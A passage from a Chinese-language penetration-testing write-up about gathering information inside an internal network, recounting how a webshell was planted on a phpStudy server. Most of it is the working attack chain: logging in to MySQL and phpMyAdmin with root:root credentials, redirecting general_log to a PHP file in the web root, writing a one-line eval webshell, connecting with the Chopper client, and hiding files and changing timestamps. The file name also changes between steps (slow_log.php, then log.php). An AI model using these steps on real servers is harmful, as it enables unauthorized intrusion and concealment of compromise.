0x01 前情提要
在内网环境中,信息收集尤为重要。(通过多种协议)探测内网存活主机也属于信息收集的一部分。
案例如下:非 root/administrator 下主动信息搜集
此 webshell 这样获取的:
1、通过扫端口,发现某站 8980 端口存在 http 服务;
2、在此端口爆破目录,发现存在 phpStudy 探针文件,获取 web 目录的绝对路径; D:/phpStudy4IIS/WWW
。在此探针文件下用 root
:root
弱密码进行 MYSQL 检测,发现尝试成功;
3、另外此端口还有 phpMyAdmin 目录,用 root
:root
登陆进去;
4、使用 general_log
方法对 mysql 写入一句话木马:
set global general_log='on'
set global general_log_file='D:\\phpStudy4IIS\\WWW\\slow_log.php' #一定要使用 '\\'
select "<?php eval($_POST[angel])?>"
5、菜刀连 http://domain:8980/log.php angel
6、连上之后做一些基本的隐蔽目录、更改文件时间等隐蔽化操作。
当前权限为: